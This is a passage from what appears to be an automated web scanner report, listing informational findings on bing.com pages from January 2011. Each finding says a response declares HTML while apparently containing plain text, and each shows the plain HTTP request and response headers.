Date: Sat, 29 Jan 2011 23:52:56 GMT
Connection: close
Set-Cookie: _SS=SID=C6D59027EA0747AB8DD2C9066F834F1B; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:56 GMT; domain=.bing.com; path=/

Ref A: F5B4F6E4E5B9412689B572FF62C306E9 Ref B: 56A5449BCB4454A3591CFD44812E8727 Ref C: Sat Jan 29 15:52:56 2011
PST

34.76. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:58 GMT
Connection: close
Set-Cookie: _SS=SID=2C96094603F74D94934001A5533E04DA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:58 GMT; domain=.bing.com; path=/

Ref A: A60093E4C7AA47038798A4654D9A4C07 Ref B: 1BCEDC468447A8228BDF0ADDC45772C1 Ref C: Sat Jan 29 15:52:58 2011
PST

34.77. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:58 GMT
Connection: close
Set-Cookie: _SS=SID=B8470F41D9A94D29A3E747A4610A6FCB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:58 GMT; domain=.bing.com; path=/

Ref A: 1069C18BD6E5459B9C3DD46EB676C09C Ref B: D8EF537DEC3F612A7C2A5DB9A8BAAE1D Ref C: Sat Jan 29 15:52:58 2011
PST

34.78. http://www.bing.com/msnhomepagehistory.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /msnhomepagehistory.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /msnhomepagehistory.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

34.79. http://www.bing.com/news/results.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:52 GMT
Connection: close
Set-Cookie: _SS=SID=5E1F9115C1EA4B9B995968DE47603F02; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:52 GMT; domain=.bing.com; path=/

Ref A: 660C8C25C216453B845C4BF350A8E898 Ref B: A6FAA5BB3557F1148A987FBDD435E11F Ref C: Sat Jan 29 15:52:52 2011
PST

34.80. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:54 GMT
Connection: close
Set-Cookie: _SS=SID=A9B88E62B70E4B34BE2F811642FCBC1F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:54 GMT; domain=.bing.com; path=/

Ref A: 439D7953469D4565AE4494844EEDD5B4 Ref B: CA8F3CCB211A2CADFC52E8BC28773568 Ref C: Sat Jan 29 15:52:54 2011
PST

34.81. http://www.bing.com/sck

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /sck

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

34.82. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

34.83. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:25 GMT
Connection: close
Set-Cookie: _SS=SID=4B63AA5A07D74FCBA119E8B63BD0D67F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:25 GMT; domain=.bing.com; path=/

Ref A: D96CB16301EF44AE8893EC77EC615AEC Ref B: 809510D4F48004696FBE33ED26C8864E Ref C: Sat Jan 29 15:53:25 2011
PST

34.84. http://www.bing.com/shopping/bird-feeders/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/bird-feeders/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/bird-feeders/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:21 GMT
Connection: close
Set-Cookie: _SS=SID=5252C1118A604E168A01D3A173CAD597; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:21 GMT; domain=.bing.com; path=/

Ref A: FC45AF618CEF48F1A3B688EF6D32EABD Ref B: BB5D84B42300459880C423CCDFE297F6 Ref C: Sat Jan 29 15:53:21 2011
PST

34.85. http://www.bing.com/shopping/content/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/content/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:23 GMT
Connection: close
Set-Cookie: _SS=SID=9083CF4DD4F04399A827441A6B678897; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:23 GMT; domain=.bing.com; path=/

Ref A: 61A90BB5808940829EE5AE85BBD649E1 Ref B: 5C9A9170F8B66396B67EE3EF37C72E23 Ref C: Sat Jan 29 15:53:23 2011
PST

34.86. http://www.bing.com/shopping/makeup/c/4259

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/makeup/c/4259

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/makeup/c/4259 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:22 GMT
Connection: close
Set-Cookie: _SS=SID=D3D7A96AE7D24FDCBD5B127206CA708D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:22 GMT; domain=.bing.com; path=/

Ref A: 773FB6CC1D0E467499310BD5490337F1 Ref B: DA1B0E5B161F7FB8939378ECE551EB11 Ref C: Sat Jan 29 15:53:22 2011
PST

34.87. http://www.bing.com/shopping/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:24 GMT
Connection: close
Set-Cookie: _SS=SID=6F54DFCFF4A344C6980F3DE7B3D74B25; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:24 GMT; domain=.bing.com; path=/

Ref A: 81C046FB99FB4BFBA5EA2F0305FD6204 Ref B: 4380637013C20C53509510739529E079 Ref C: Sat Jan 29 15:53:24 2011
PST

34.88. http://www.bing.com/shopping/swimwear/c/4503

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/swimwear/c/4503

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/swimwear/c/4503 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:20 GMT
Connection: close
Set-Cookie: _SS=SID=C42C62E80354428984A0B25122A137A1; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:20 GMT; domain=.bing.com; path=/

Ref A: 2356F9C5F52D438CAB518EA2D215DC2D Ref B: F9E018AA659B2CF02D557CF10072F817 Ref C: Sat Jan 29 15:53:20 2011
PST

34.89. http://www.bing.com/travel/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:59 GMT
Connection: close
Set-Cookie: _SS=SID=6091FAEBF64A421B858A5F3BFDBD054C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:59 GMT; domain=.bing.com; path=/

Ref A: F5C8CCEB162144C591857AB9E14F1760 Ref B: EDE90AA1BDD0FCA4CA6C0156B9267B78 Ref C: Sat Jan 29 15:52:59 2011
PST

34.90. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:00 GMT
Connection: close
Set-Cookie: _SS=SID=4A19CEB3D764484EAC22E549B296859E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:00 GMT; domain=.bing.com; path=/

Ref A: C1333EA8AE1944F9A0830AC35E7CBBED Ref B: F223F3A6ABA5B3E28BB1A762FC73FA2F Ref C: Sat Jan 29 15:53:00 2011
PST

34.91. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:01 GMT
Connection: close
Set-Cookie: _SS=SID=5145343C6A314699A805392591398E29; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:01 GMT; domain=.bing.com; path=/

Ref A: CA30FCAAD9E84C74BE6018CB1CEBBCAF Ref B: 2B2C12697EE00036CE2B7CA4CFFC3D75 Ref C: Sat Jan 29 15:53:01 2011
PST

34.92. http://www.bing.com/travel/deals/last-minute-flight-deals.do

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/last-minute-flight-deals.do

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/deals/last-minute-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:03 GMT
Connection: close
